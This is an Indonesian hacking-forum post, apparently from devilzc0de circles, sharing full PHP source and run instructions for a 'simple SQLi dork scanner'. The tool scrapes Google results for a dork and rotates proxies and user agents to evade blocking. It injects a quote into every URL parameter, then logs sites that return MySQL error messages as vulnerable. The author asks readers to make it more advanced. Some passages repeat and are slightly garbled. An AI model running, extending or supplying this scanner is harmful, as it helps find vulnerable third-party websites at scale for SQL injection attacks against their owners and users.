ijin share dork scan punya ane
mohon dikembangkan lagi gan
dan ini gambar jika menggunakan proxy
tuh berarti proxy yg dipke harus bener2 FRESH dan tahan lama, jika tidak, maka beberapa url atau bahkan semua url tidak bisa digraph.
skarang penjelasan selanjutnya.
tuh konsep dari dork scanner ane, jika url ada parameter tertentu kya gini misal:
sesuai dengan simbol yg dimasukkan.
jika url tidak ada parameter kya di atas, akan direturn ke url aslinya
ane cuman bisa nangkep site vuln berdasarkan pesan sql error pda umunya gan, jadi site keluar gak terlalu banyak. ni gan buat ngecek apakah tuh site vuln ato kagak
mohon dikembangin lagi biar bisa menjadi tool yg advanced gan
mohon dikembangkan lagi gan
<?phpcopas ke notepad trus simpan dgn extensi php, trus buka cmd, masuk ke path dmana taruh file php tadi, trus jalanin pke printah php scan.php, dgn syarat path nya harus udah ditambahin/diatur ke c:\xampp\php
//Coded by RieqyNS13
//Greeting to Allah swt and all devilzc0de.org members
class rieqyns13{
public $dork;
public $jumlah;
public $key;
public $simpan;
public $hapus_yg_sama;
public $proxy;
public $proxy_file;
private $useragent = array(
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
'Opera/9.25 (Windows NT 5.1; U; en)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:50',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+2011-10-16 20:21:10',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6'
);
function match($start, $end, $var){
return preg_match_all("|".preg_quote($start).'(.*?)'.preg_quote($end)."|", $var, $m) ? $m[1] : null;
}
function graph($dork=null, $x, $url=null){
$ch = curl_init();
if($dork != null && is_numeric($x)){
curl_setopt($ch, CURLOPT_URL, "http://www.google.com/search?q=".urlencode($dork)."&ie=UTF-8&start=".urlencode($x));
}elseif($url != null && $x==null){
curl_setopt($ch, CURLOPT_URL, $url);
}
if($this->proxy==true){
curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, false);
curl_setopt($ch, CURLOPT_PROXY, $this->proxy());
}
curl_setopt($ch, CURLOPT_USERAGENT, array_rand($this->useragent));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_AUTOREFERER, true );
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15);
$exec = curl_exec($ch);
curl_close($ch);
return $exec;
}
function proxy(){
if(@is_file($this->proxy_file)){
$file = file($this->proxy_file);
return str_replace(array("\n", "\r", "\r\n"), "", $file[array_rand($file)]);
}else return "tidak ada file {$this->proxy_file}, tolong buat dulu";
}
function parse($url){
$this->key = str_replace(array("\n", "\r", "\r\n"), "", $this->key);
$arr = parse_url($url);
if(empty($arr['query'])){
return $url;
}
parse_str($arr['query'], $ar);
$key = array_keys($ar);
foreach($key as $a){
$x[] = $a."=".$ar[$a].$this->key;
}
$imp = implode("&", $x);
return $arr['scheme']."://".$arr['host'].$arr['path']."?".$imp;
}
function simpan($url){
$fp = fopen($this->simpan, "a");
fwrite($fp, $url."\n");
fclose($fp);
}
function cekurls($urls){
$urlv = null;
if($this->hapus_yg_sama==false) return $urls;
elseif($this->hapus_yg_sama==true){
for($a=0; $a<count($urls); $a++){
$dev = parse_url($urls[$a]);
@$scheme[] = $dev['scheme'];
@$host[] = $dev['host'];
if(empty($dev['path'])) $path[] = null;
elseif(!empty($dev['path'])) $path[] = $dev['path'];
if(empty($dev['query'])) $prm[] = null;
elseif(!empty($dev['query'])) $prm[] = $dev['query'];
}
if(isset($host)){
$unik = array_unique($host);
foreach($unik as $key=>$url){
if(!empty($prm[$key])){
$prm = "?".$prm[$key];
}elseif(empty($prm[$key])) $prm = null;
$urlv[] = $scheme[$key]."://".$url.$path[$key].$prm;
}
return $urlv;
}elseif(!isset($host) && $this->proxy==false) echo "[Error] ";
elseif(!isset($host) && $this->proxy==true) echo "[Proxy mungkin tidak valid] ";
}
}
function scandork(){
$dork = $this->dork;
$dork = str_replace(array("\n", "\r", "\r\n"), "", $dork);
$start=0;
$jumlah=0;
$page=0;
$total=0;
while($jumlah<=$this->jumlah){
$a=0;
$graph = $this->graph($dork, $start, null);
$match = $this->match('<h3 class="r"><a href="/url?q=', '&sa=U&', $graph);
$cekurls = $this->cekurls($match);
if(count($cekurls)==0){
echo "hasil tidak ada atau ada halangan captcha :p\n";
continue;
}
$mulai = time();
foreach($cekurls as $url){
$urlp = $this->parse(urldecode($url));
$graph = $this->graph(null, null, $urlp);
if(preg_match("/error in your SQL syntax|mysql_fetch_array\(\)|execute query|mysql_fetch_object\(\)|mysql_num_rows\(\)|mysql_fetch_assoc\(\)|mysql_fetch\?\?_row\(\)|SELECT \* FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $graph)){
echo "vuln -> ".urldecode($urlp)."\n";
$this->simpan($urlp);
$a++;
}else{
echo "NOT vuln - > ".urldecode($urlp)."\n";
}
$jumlah++;
}
$selang = time() - $mulai;
$detik = round($selang);
$menit = round($selang / 60);
$jam = round($selang / 3600);
$start=$start+count($cekurls);
$page++;
echo "Selesai scan page {$page} dalam : {$jam} jam {$menit} menit {$detik} detik\n\n";
}
echo "Jumlah situs yang discan {$jumlah}\n";
}
}
echo "simple dork scanner by rieqyns13\n\n";
$dc = new rieqyns13;
echo "Masukkan dork = ";
$fp = fopen("php://stdin", "rb"); //dorknya
$str = fgets($fp);
echo "Masukkan simbol/key = "; //simbol yg disisipkan pada url
$key = fgets($fp);
fclose($fp);
///OPTION///////////////////////////////////
$dc->hapus_yg_sama = true; //isi true jika ingin menghapus url yg sama dalam setiap page, false jika tidak
$dc->proxy = true; //true jika ingin menggunakan proxy yg ada di $dc->proxy_file, atau false jika tidak ingin menggunakan proxy
$dc->proxy_file = "proxylist.txt"; //digunakan jika $dc->proxy=true, setiap proxy yg ada di dalam file harus menggunakan susunan -> proxy:port . contoh "914.143.141.131:8080"
$dc->jumlah = 300; //jumlah situs yg discan
////////////////////////////////////////////
$dc->dork = $str;
$dc->key = $key;
$dc->simpan = "url_vuln.txt";
$dc->scandork();
?>
dan ini gambar jika menggunakan proxy
skarang penjelasan selanjutnya.
tuh konsep dari dork scanner ane, jika url ada parameter tertentu kya gini misal:
http://site.com/detail.php?id=2&next.asp?cat=21&gay.cfm?id=nullntar dirubah ke
http://site.com/detail.php?id=2'&next_asp?cat=21'&gay_cfm?id=null'
sesuai dengan simbol yg dimasukkan.
jika url tidak ada parameter kya di atas, akan direturn ke url aslinya
ane cuman bisa nangkep site vuln berdasarkan pesan sql error pda umunya gan, jadi site keluar gak terlalu banyak. ni gan buat ngecek apakah tuh site vuln ato kagak
if(preg_match("/error in your SQL syntax|mysql_fetch_array\(\)|execute query|mysql_fetch_object\(\)|mysql_num_rows\(\)|mysql_fetch_assoc\(\)|mysql_fetch\?\?_row\(\)|SELECT \* FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $graph))pngalam ane klo keseringan pke dork yg kompleks, biasanya diblock ama captcha gan mohon dikembangin lagi biar bisa menjadi tool yg advanced gan
0 Komentar untuk "Simple Sqli Dork Scanner"